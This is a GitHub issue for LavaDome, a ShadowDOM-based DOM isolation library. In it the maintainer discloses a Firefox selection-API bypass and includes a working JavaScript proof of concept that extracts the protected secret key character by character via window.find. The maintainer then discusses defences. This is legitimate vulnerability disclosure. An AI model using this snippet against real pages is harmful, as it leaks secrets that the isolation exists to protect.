LavaDome is vulnerable to selection API

LavaMoat / LavaDome

Secure DOM trees isolation and encapsulation leveraging ShadowDOM

https://lavamoat.github.io/LavaDome/packages/core/demo/

MIT License

16 stars 3 forks source link

LavaDome is vulnerable to selection API #15

Open weizman opened 6 months ago

weizman commented 6 months ago

When running in Firefox, Secret protected by LavaDome can easily be leaked.

Visit the demo using Firefox
Open console and run the code below, see how full key is obtained by code

setTimeout(()=>{
    document.body.prepend('xxx');
    const result = [];
    for (const l of 'abcdefghijklmnopqrstuvwxyz0123456789') {
        while (find(l)) {
            const anchor = getSelection().anchorNode;
            const host = anchor?.parentNode?.parentNode?.host;
            if (host instanceof HTMLElement) {
                const at = Array.from(host.parentElement.children).indexOf(host);
                result[at] = l;
            }
        }
        window.find('xxx', false, true);
    }
    console.log('key', result.join(''));
}
, 1000);

weizman commented 6 months ago

We saw that coming already (see "secret splitting" section).

I don't see a way around this at the moment, so either we convince browsers to ship a native and secure Snow version (which will take years) or we convince Firefox to fix the bug that's causing this (wip)

Or we come up with a clever defense. I thought about making use of selectionchange event which captures the find call, but since attack is sync, the secret is compromised before the event fires...

I wonder how this one will play out